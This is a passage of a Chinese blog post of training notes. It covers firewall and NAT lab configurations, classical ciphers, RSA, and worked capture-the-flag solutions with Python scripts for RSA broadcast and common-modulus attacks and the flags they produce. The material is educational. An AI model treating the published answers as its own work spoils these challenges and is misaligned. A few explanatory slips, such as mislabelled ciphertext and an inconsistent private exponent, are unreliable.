网络攻防实战演练(国网山东泰安学习)

已于 2023-07-20 17:56:26 修改
阅读量821 收藏 2
点赞数 2
分类专栏: 次要的个人笔记 文章标签: 网络 学习 php
于 2023-07-20 09:40:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46085118/article/details/131787572
版权

文章目录

一、网络防火墙配置

练习1-DMZ和Untrust域间策略配置

  • 题目描述:为了实现untrust区域的PC1 2.2.2.1能访问DMZ区域的server1服务器,配置安全策略。

  • 最后配置形成的拓扑图
    在这里插入图片描述

  • 每个设备需要运行的命令(可直接复制执行)

    • FW1
    system-view
sysname FW1
interface g0/0/1
ip address 192.16.1.254 24
interface g0/0/2
ip address 2.2.2.254 24
quit
firewall zone dmz
add interface GigabitEthernet 0/0/1
firewall zone untrust
add interface GigabitEthernet 0/0/2
quit
policy interzone untrust dmz inbound
policy 2
policy source 2.2.2.1 mask 32
policy destination 192.16.1.1 mask 32
action permit
quit
quit

  • 运行命令截图

    • Server1
      在这里插入图片描述

    • FW1
      在这里插入图片描述

    • PC1
      在这里插入图片描述

  • 运行成功截图
    在这里插入图片描述

练习2.三个区域配置拓扑

  • 题目描述:配置防火墙的域间包过滤策略、PC1所在网段能够访问Client1,但是Client1无法访问PC1网段;Client1只允许访问Server1的ICMP、http服务。

  • 最后配置形成的拓扑图
    在这里插入图片描述

  • 每个设备需要运行的命令(可直接复制执行)

    • FW1
    system-view
sysname FW1
#防火墙接口配置
interface GigabitEthernet0/0/1
ip address 192.168.1.254 24
interface GigabitEthernet0/0/2
ip address 172.16.1.254 24
interface GigabitEthernet0/0/3
ip address 10.1.1.254 24
quit
#将防火墙接口添加到相应的安全区域
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone dmz
add interface GigabitEthernet0/0/2
firewall zone untrust
add interface GigabitEthernet0/0/3
quit
#配置域间策略
policy interzone trust untrust outbound
policy 10
policy destination 10.1.1.1 mask 32
policy source 192.168.1.0 mask 24
action permit
quit
policy interzone untrust dmz inbound
policy 1
policy source 10.1.1.1 mask 32
policy destination 172.16.1.1 mask 32
policy service service-set icmp http
action permit
quit
quit

  • 运行命令截图

    • PC1
      在这里插入图片描述

    • FW1
      在这里插入图片描述

    • Client1
      在这里插入图片描述

    • Server1
      在这里插入图片描述

在这里插入图片描述

  • 运行成功截图
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

练习3-源NAT地址转换实验

  • 题目描述:为了使私网中192.168.1.0/24网段的用户可以正常访问Internet,需要在NGFW上配置源NAT策略。除了公网接口的IP地址外,
    公司还向ISP申请了2个IP地址(1.1.1.10~1.1.1.11)作为私网地址转换公网地址使用,转换后能访问1.1.1.0/24

  • 最后配置形成的拓扑图
    在这里插入图片描述

  • 每个设备需要运行的命令(可直接复制执行)

    • AR2
    system-view
sysname AR2
interface GigabitEthernet 0/0/0
ip address 192.168.1.254 24
interface GigabitEthernet 0/0/1
ip address 10.10.1.1 24
quit
ip route-static 0.0.0.0 0 10.10.1.2
    • FW1
    system-view
sysname FW1
interface GigabitEthernet 0/0/1
ip address 10.10.1.2 24
interface GigabitEthernet 0/0/2
ip address 1.1.1.254 24
quit
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone untrust
add interface GigabitEthernet0/0/2
quit
ip route-static 0.0.0.0 0 1.1.1.1
ip route-static 192.168.1.0 24 10.10.1.1
#配置黑洞路由
ip route-static 1.1.1.10 32 NULL0
ip route-static 1.1.1.11 32 NULL0
#配置域间区域
policy interzone trust untrust outbound
policy 1
policy source 192.168.1.0 mask 24
policy destination 1.1.1.0 mask 24
policy destination 2.2.2.0 mask 24
action permit
quit
quit
#配置源地址
nat address-group 1 1.1.1.10 1.1.1.11
nat-policy interzone trust untrust outbound
policy 2
action source-nat 
policy source 192.168.1.0 mask 24
address-group 1 
quit
quit
    • Router
    system-view
sysname Router
interface GigabitEthernet 0/0/0
ip address 1.1.1.1 24
interface GigabitEthernet 0/0/1
ip address 2.2.2.254 24
quit
ip route-static 0.0.0.0 0 1.1.1.254

  • 运行命令截图

    • AR2
      在这里插入图片描述

    • FW1
      在这里插入图片描述

    • Router
      在这里插入图片描述

    • PC1
      在这里插入图片描述

    • PC2
      在这里插入图片描述

    • PC4
      在这里插入图片描述

  • 运行成功截图
    在这里插入图片描述
    在这里插入图片描述

模拟考

  • 题目描述:
	为了使私网中192.168.1.0/24网段的用户可以正常访问Internet,需要在NGFW上配置源NAT策略。
	除了公网接口的IP地址外,公司还向ISP申请了2个IP地址(1.1.1.10~1.1.1.11)作为私网地址转换成公网地址使用,转换后能访问1.1.1.0/24和2.2.2.0/24地址。
	网络环境如图所示,其中Router是ISP提供的接入网关。
	1.配置PC办公终端IP地址、网关地址。
	2.配置路由器接口地址、路由
	(1)AR1配置出方向默认路由;
	(2)Router配置接口地址。
	3.配置防火墙
	(1)配置接口地址,划分安全区域;
	(2)配置互通路由:
	出方向写默认路由、黑洞路由
	入方向写明细路由。
	(3)配置域间策略policy 1,使Trust区域192.168.1.0/24段地址能够访问Untrust区域1.1.1.0/24、2.2.2.0/24段地址。
	4.配置NAPT,使内网192.168.1.0/24段用户转换成公网地址池address-group 1(1.1.1.10~1.1.1.11)访问internat。
	5.验证,由PC1、PC2ping2.2.2.1,在防火墙查看会话列表,源地址nat是否转换成功

  • 最后配置形成的拓扑图
    在这里插入图片描述

  • 每个设备需要运行的命令(可直接复制执行)

    • AR1
    system-view
sysname AR1
interface GigabitEthernet 0/0/0
ip address 192.168.1.254 24
interface GigabitEthernet 0/0/1
ip address 10.10.1.1 24
quit
ip route-static 0.0.0.0 0 10.10.1.2
    • FW
    system-view
sysname FW
interface GigabitEthernet 0/0/1
ip address 10.10.1.2 24
interface GigabitEthernet 0/0/2
ip address 1.1.1.254 24
quit
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone untrust
add interface GigabitEthernet0/0/2
quit
ip route-static 0.0.0.0 0 1.1.1.1
ip route-static 192.168.1.0 24 10.10.1.1
#配置黑洞路由
ip route-static 1.1.1.10 32 NULL0
ip route-static 1.1.1.11 32 NULL0
#配置域间区域
policy interzone trust untrust outbound
policy 1
policy source 192.168.1.0 mask 24
policy destination 1.1.1.0 mask 24
policy destination 2.2.2.0 mask 24
action permit
quit
quit
#配置源地址
nat address-group 1 1.1.1.10 1.1.1.11
nat-policy interzone trust untrust outbound
policy 2
action source-nat 
policy source 192.168.1.0 mask 24
address-group 1 
quit
quit
    • Router
    system-view
sysname Router
interface GigabitEthernet 0/0/0
ip address 1.1.1.1 24
interface GigabitEthernet 0/0/1
ip address 2.2.2.254 24
quit
ip route-static 0.0.0.0 0 1.1.1.254

  • 运行命令截图

    • AR1
      在这里插入图片描述

    • FW
      在这里插入图片描述

    • Router
      在这里插入图片描述

    • PC1
      在这里插入图片描述

    • PC2
      在这里插入图片描述

    • PC3
      在这里插入图片描述

  • 运行成功截图
    在这里插入图片描述

二、网络安全—密码编码学

1.常见编码(简要介绍,详细看ppt)

  1. ascii 码
    在计算机中,所有的数据在存储和运算时都要使用二进制数表示,ascii码即
    为8位二进制对应256字符的码表。

  2. 摩斯电码
    使用“.”表示短音,使用“-”表示长音,使用“/”或“ ”表示分隔符。

  3. base编码
    base编码存在的意义是将所有字符的表达集中在一些常见的、可见的字符集
    上。

2. 常见的古典密码类型(简要介绍,详细看ppt)

  1. 栅栏密码:
    栅栏密码密钥只有一个数字k,表示栅栏的长度,就是将加密的明文分成k个
    一组,然后依次把每组的第n个字连起来,形成一段无规律的话。

  2. 凯撒密码:
    明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移
    后被替换成密文。

  3. 维吉尼亚密码:(特殊的凯撒密码)
    维吉尼亚密码则是由一些偏移量不同的恺撒密码组成。为了生成密码,需要使用表格法。偏移量由密码的密钥决定。

  4. 云影密码:
    又称01248密码,用0做间隔,其他非零数隔开后,每组加起来表示序号为
    1-26的英文字母,只有大写。

3. 现代密码-rsa

  • RSA是典型非对称加密系统,其加解密难度基于大整数分解问题。
  • 加密过程
    公钥(E,N)
    在这里插入图片描述
  • 解密过程
    私钥(D,N)
    在这里插入图片描述
  • E和D是如何计算得到的过程
    ① 准备两个互质数p,q(提前和大家说明一点,相同的p,q下可以得到多对的E和D)
    ② N = p * q
    ③ L = lcm(p-1,q-1):lcm表示求最小公倍数
    ④ 求E:不是唯一的,任取一个。满足后面两个条件即可,gcd表示最大公约数:
    1<E<L,同时 gcd(E,L)=1(也就是E和L互质)
    ⑤ 求D :当E确定了,D的值也变得唯一,因为只能算出一个。需要满足两个条件,同时这时D的计算方式比较麻烦,只能枚举2到L计算得到(可以参考作者使用java写的程序)
    1 < D < L,同时E*D mod L = 1
    ⑥ 通过具体数字解释
        public static void main(String[] args) {
    // 保证p和q互质即可
    Integer p=17;
    Integer q=19;
    //计算得到 n=p*q= 323;
    Integer n=p*q;
    // L = lcm(p-1, q-1)= lcm(16,18) = 144
    Integer L=144;
    // 随机取的一个5,满足互质条件即可。(这里也可以取7,取的不同,后面得到的D也会不同)
    Integer E=5;
    Integer D;
    //循环之后得到一对公钥(5),私钥(19);实际上公钥私钥都是相对的,如果公钥为 19,那么私钥则为 5;
    for (int i = 2; i < 144; i++) {
        D=i;
        if(E*D % L == 1){
            System.out.println(D);
            break;
        }
    }
    // 假设明文 = 123,则 密文=(123的5次方)mod 323=225。
    // 解密:明文=(225的29次方)mod 323 =123,所以解密后的明文为123。(作者无法通过java演示,因为数字会过大,导致计算错误)
}

4. 密码-rsa常见的攻击方式的特点(靶场题目判断)

  1. rsa广播攻击:有多个C(明文),多个N
  2. rsa共模攻击:有2个及两个以上的E,一个N
  3. rsa低加密指数小明文:E(公钥)比较小
  4. rsa低解密指数(也称为维纳攻击):E(公钥)特别大

5. 国网技术学院(泰安)靶场题目(讲解)

* 题目整体一览

在这里插入图片描述

* 凯撒加密(第一个为题目,第二个为解题程序,第三个为答案)

  • 题目
    型如flag{***}加密后,密文为gmcj\x80o|\x84\x86X\xd6,求明文。

    a='gmcj\x80o|\x84\x86X\xd6'
b='flag{'
c=''
for i in range(5):
	print(ord(a[i])-ord(b[i]))
temp1=1
temp2=1
temp3=1
for i in range(len(a)):
	c+=chr(ord(a[i])-temp1)
	temp3=temp2
	temp2=temp1+temp2
	temp1=temp3
print(c)

    flag{good!}

* base加密

  • 题目:
    Nhwit8Y3NUordknZocPMYFRxj2KiaJCsvVZtQ8NXCzTU4ZGCGfkTtqrycGbmadsQTLfmsK2

    flag{327a6c4304ad5938eaf0efb6cc3e53dc}
    • 解题思路
      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述

* rsa广播攻击

  • 题目
    e = 13
n1=
92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559
n2=
47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823
n3=
105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863
c1=
44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637
c2=
19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897
c3=
89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714

求明文m。

    #exp
#coding:utf-8
from Crypto.Util.number import long_to_bytes,bytes_to_long

from gmpy2 import invert, iroot
def broadcast(n1, n2 ,n3, c1, c2, c3):
	n = [n1, n2, n3]
	C = [c1, c2, c3]
	N = 1
	for i in n:
		N *= i
		Ni = []
	for ni in n:
		Ni.append(N // ni)
		T = []
	for i in range(3):
		T.append(invert(Ni[i], n[i]))
		X = 0
	for i in range(3):
		X += C[i] * Ni[i] * T[i]
	m = X % N
	return m
def main():
	e = 13
	n1=92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559
	n2=47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823
	n3=105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863
	c1=44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637
	c2=19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897
	c3=89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714
	m = broadcast(n1, n2 ,n3, c1, c2, c3)
	print(long_to_bytes(iroot(m,e)[0]))
	print(m)
if __name__=="__main__":
	main()


    flag{09a3f8480a4a95478274b23fcec4073b}

* rsa共模攻击

  • 题目
    n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631

e1=3961

e2=39661

c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339

c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728


求明文m。	

    import libnum
import gmpy2

n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631
e1=3961
e2=39661
c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339
c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728

def exp_def(e1,e2,c1,c2,n):
    s,s1,s2 = gmpy2.gcdext(e1, e2)
    m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0]
    return int(m)

m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))	

    flag{gongmogongji!}

* 摩斯电码

  • 题目
    -- --- .-. ... . -.-. --- -.. .

    flag{MORSECODE}
    • 解题思路
      在这里插入图片描述

* 凯撒加密-3

```txt
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']

alphabet = 'abcdefghijklmnopqrstuvwxyz{}'

flag = '************'
c = ''
count=0
for i in flag:
	count=count+1
	print(count)
	c+= table[alphabet.index(i)]
print(c)

# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'	
```
```python
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']

alphabet = 'abcdefghijklmnopqrstuvwxyz{}'

flag = ''
b=[]
c = '0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
for i in range(0,len(c),5):
	print(c[i:i+5])
	flag+=alphabet[table.index(c[i:i+5])]
print(flag)

# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```txt
flag{taianxiaoqu}
```

* 凯撒加密-2

  • 题目
    密文为fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT,明文型如flag{***}。

    a='fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT'
b='flag{'
c=''
for i in range(5):
	print(ord(a[i])-ord(b[i]))
for i in range(len(a)):
	if i%2==0:
		c+=chr(ord(a[i])-i)
	else:
		c+=chr(ord(a[i])+i)
print(c)	

    flag{d7c442c4-c4c7-46c6-9407-35f030a46cf2}

* 维吉尼亚

  • 题目
    密文为``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x由维吉尼亚密码加密而来,密钥6位,明文为型如flag{***}。

    a='``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x'
b='flag{'
c=''

# 维吉尼亚密码
for i in range(5):
	print(ord(a[i])-ord(b[i]))
key=[-6,-12,-7,-5,-8,-5]
key.append(5)
print(key)
for i in range(len(a)):
	c+=chr(ord(a[i])-key[i%6])
print(c)	

    flag{Vigenère_is_very_interesting!!}

* 栅栏密码

  • 题目
    一串型如flag{***}的字符串栅栏加密后为:fghai}l{anmazlma,其中栏数为3。

    # _*_ encoding:utf-8 _*_
import math


def buwei(encrypted_str,fence_length):    # 比如 14,4
    str_len = len(encrypted_str)
    fence_count = math.ceil(str_len/ fence_length)   # 得出4
    target_length = fence_count*fence_length
    jiequ = []
    while str_len<target_length:
        encrypted_str = encrypted_str + '*'
        jiequ.append(encrypted_str[-fence_count :])
        encrypted_str = encrypted_str[:-fence_count]
        str_len += 1

    jiequ.reverse()
    s = ''
    for i in jiequ:
        s = s + i

    result = encrypted_str + s
    return result


def decrypt_fence(encrypted_str,fence_length):
    encrypted_str = buwei(encrypted_str,fence_length)
    if fence_length>=len(encrypted_str) or fence_length<1:
        print("栅栏长度太大或者太小,无需解密")
        return
    fence_count = math.ceil(len(encrypted_str)/fence_length)
    elen=len(encrypted_str)

    # b = elen // f  # 用字符串实际长度除以上面计算出能整出的数字f
    result = {x: '' for x in range(fence_count)}
    for i in range(elen):  # 字符串有多少位,就循环多少次
        a = i % fence_count
        result.update({a: result[a] + encrypted_str[i]})  # 字符串截断,并更新数据
    d = ''
    for i in range(len(result)):
        d += result[i]

    d = d.replace("*", '')
    print(f'假设每栏字数为:{fence_length},解密结果为:{d}')  # 输出结果,并开始下一个循环

for i in range(2,10):
	decrypt_fence('fghai}l{anmazlma', i)
	

    flag{zhalanmima}

* 云影密码

  • 题目
    8842101220480224404014224202480122

    a='8842101220480224404014224202480122'
s=a.split('0')
print(s)
l=[]
flag=''
for i in range(len(s)):
	sum=0
	for j in range(len(s[i])):
		sum+=int(s[i][j])
	l.append(sum)
print(l)
for i in range(len(l)):
	flag+=chr(ord('A')+l[i]-1)
print(flag)


    flag{WELLDONE}

* base64隐写

  • 题目
    U3RlZ2Fub2dyYXBoeSBpcyB0aGUgYXJ0IGFuZCBzY2llbmNlIG9m
IHdyaXRpbmcgaGlkZGVuIG1lc3NhZ2VzIGluIHN1Y2ggYSB3YXkgdGhhdCBubyBvbmV=
LCBhcGFydCBmcm9tIHRoZSBzZW5kZXIgYW5kIGludGVuZGVkIHJlY2lwaWVudCwgc3VzcGU=
Y3RzIHRoZSBleGlzdGVuY2Ugb2YgdGhlIG1lc3M=
YWdlLCBhIGZvcm0gb2Ygc2VjdXJpdHkgdGhyb3VnaCBvYnNjdXJpdHkuIFS=
aGUgd29yZCBzdGVnYW5vZ3JhcGh5IGlzIG9mIEdyZWVrIG9yaWdpbiBhbmQgbWVhbnMgImNvbmNlYW==
bGVkIHdyaXRpbmciIGZyb20gdGhlIEdyZWVrIHdvcmRzIHN0ZWdhbm9zIG1lYW5pbmcgImNv
dmVyZWQgb3IgcHJvdGVjdGVkIiwgYW5kIGdyYXBoZWluIG1lYW5pbmcgInRvIHc=
cml0ZSIuIFRoZSBmaXJzdCByZWNvcmRlZCB1c2Ugb2YgdGhlIHRlcm0gd2FzIGluIDE0OTkgYnkgSm9o
YW5uZXMgVHJpdGhlbWl1cyBpbiBoaXMgU3RlZ2Fub2dyYXBoaWEsIGEgdHJlYV==
dGlzZSBvbiBjcnlwdG9ncmFwaHkgYW5kIHN0ZWdhbm9ncmFwaHkgZGlzZ8==
dWlzZWQgYXMgYSBib29rIG9uIG1hZ2ljLiBHZW5lcmFsbHksIG1lc3P=
YWdlcyB3aWxsIGFwcGVhciB0byBiZSBzb21ldGhpbmcgZWxzZTogaW1hZ2VzLCBhcnRp
Y2xlcywgc2hvcHBpbmcgbGlzdHMsIG9yIHNvbWUgb3R=
aGVyIGNvdmVydGV4dCBhbmQsIGNsYXNzaWNhbGx5LCB0aGUgaGlkZGVuIG1lc3NhZ2UgbWF5IGJlIGluIGludmm=
c2libGUgaW5rIGJldHdlZW4gdGhlIHZpc2libGUgbGluZXMgb2YgYSBwcml2YXRlIGxldHRlci4NCg0KVGhl
IGFkdmFudGFnZSBvZiBzdGVnYW5vZ3JhcGh5LCBvdmVyIGNy
eXB0b2dyYXBoeSBhbG9uZSwgaXMgdGhhdCBtZXNzYWdlcyBkbyBub3QgYXR0cmFjdCBhdHRlbnRpb25=
IHRvIHRoZW1zZWx2ZXMuIFBsYWlubHkgdmlzaWJsZSBlbmNyeXB0ZWQgbWVzc2FnZXOXbm8gbWF0dGVyIF==
aG93IHVuYnJlYWthYmxll3dpbGwgYXJvdXNlIHN=
dXNwaWNpb24sIGFuZCBtYXkgaW4gdGhlbXNlbHZlcyBiZSBpbmNyaW1pbmF0aW5nIP==
aW4gY291bnRyaWVzIHdoZXJlIGVuY3J5cHRpb24gaXMgaWxsZWdhbC4gVGhlcmVmb3JlLH==
IHdoZXJlYXMgY3J5cHRvZ3JhcGh5IHByb3RlY3RzIHRoZSBjb250ZW50cyBvZj==
IGEgbWVzc2FnZSwgc3RlZ2Fub2dyYXBoeSBjYW4gYmUgc2FpZCB0byBwcm90ZWN0IGJ=
b3RoIG1lc3NhZ2VzIGFuZCBjb21tdW5pY2F0aW5nIHBhcnRpZXMuDQoNClN0ZWdhbm9ncmFwaHkgaW5jbHW=
ZGVzIHRoZSBjb25jZWFsbWVudCBvZiBpbmZvcm1hdGlvbiB3aXRoaW4gY29t
cHV0ZXIgZmlsZXMuIEluIGRpZ2l0YWwgc3RlZ2Fub2dyYXBoeSwgZWxlY3Ryb25pYyBjb21tdW5pY2F0aW9u
cyBtYXkgaW5jbHVkZSBzdGVnYW5vZ3JhcGhpYyBjb2RpbmcgaW5zaZ==
ZGUgb2YgYSB0cmFuc3BvcnQgbGF5ZXIsIHN1Y2ggYXMgYSBkb2N1bWVudCBmaWxlLCBpbWFnZSBmaWx=
ZSwgcHJvZ3JhbSBvciBwcm90b2NvbC4gTWVkaWEg
